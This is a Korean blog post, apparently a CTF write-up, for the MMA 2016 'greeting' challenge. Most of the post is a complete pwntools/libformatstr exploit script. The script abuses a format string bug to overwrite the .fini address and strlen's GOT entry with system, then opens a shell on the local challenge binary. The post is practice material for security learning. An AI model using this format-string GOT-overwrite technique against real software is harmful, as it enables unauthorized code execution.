프로필사진

JIWON J1W0N

[mma_2016] greeting

PWN/CTF 2019. 1. 18. 22:48

728x90

오랜만에 올리는 라업! 내일 면접인데 잘보게 해주세요 ㅎㅎ


이 문제 또한 오랜만에 하는 FSB라서 재미있었다!!!

오늘 TIPS에 libformatstr에 대해서 포스팅 했는데 알자마자 써본 문제중 하나다!!!

pwntools에도 fmtstr이 있다지만 사용법을 잘 모르겠어서 libformatstr을 사용했다!



from pwn import *
from libformatstr import *

s = process("./greeting")

elf = ELF("./greeting")

#12, AAAAAA
#fini is 0x08049934

gdb.attach(s,'b *0x0804864F')


s.recvuntil("Please tell me your name... ")
p = FormatStr()

p[0x08049934] = 0x080485ED
p[elf.got['strlen']] = elf.plt['system']

pay = p.payload(12,2,18)

s.sendline(pay)

s.sendline("sh")

s.interactive()


저작자표시 비영리 변경금지

'PWN > CTF' 카테고리의 다른 글

[Codegate 2019] got-the-reum  (0) 2019.02.05
[codegate 2018] marimo  (0) 2019.01.24
[PCTF 2015] prodmanager  (0) 2019.01.05
[DefCamp CTF 2016] Warm heap  (0) 2019.01.03
[SECCON 2016] checker  (0) 2018.12.30

댓글
Powered by
Designed by 동건

티스토리툴바